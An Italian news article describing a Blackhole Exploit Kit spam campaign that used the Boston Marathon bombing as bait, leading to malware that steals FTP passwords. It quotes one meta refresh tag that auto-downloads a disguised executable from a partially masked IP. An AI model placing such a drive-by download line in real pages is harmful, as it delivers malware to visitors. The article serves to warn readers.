Cybercriminali in azione dopo l’attentato di Boston

Il cybercrimine non si ferma nemmeno davanti a tragedie come quella avvenuta lunedì scorso durante la maratona di Boston, attentato che ha causato tre morti e almeno 180 feriti di cui alcuni in modo grave.

A poche ore dall’attentato sono state inviate migliaia di email di spam (Blackhole Exploit Kit) in tutto il mondo, centinaia anche verso account italiani. Nel corpo del messaggio è presente un URL dannoso che indirizzerà il nostro browser verso una pagina internet composta da sei video youtube relativi l’attentato di Boston, nell’ultima, in basso a dx, risiede il malware tranne in alcuni casi dove il codice infetto è corrotto, in questo caso all’interno della sesta finestra, invece del video, apparirà la scritta “sdioolg sh Ispod”.

Una volta avviato il sesto video verrà scaricato ed installato automaticamente, grazie ad un meta refresh, il file infetto con doppia estensione boston.avi______.exe (750 KB) tutto questo sfruttando un bug nella Java, ad oggi decine di URLs infette sono state rimosse dall’Hosting che le ospitava.

Esempio del meta refresh:

<meta http-equiv=”refresh” content=”60; url=http://95.**.***.**1/boston.avi_______.exe”>

Il malware ha la capacità di registrare ed inviare da remoto le nostre password d’accesso di programmi per il trasferimento dei file (FTP) come  FileZilla, LeapFTP, P32bit FTP, FTP Control, SecureFX, BitKinex.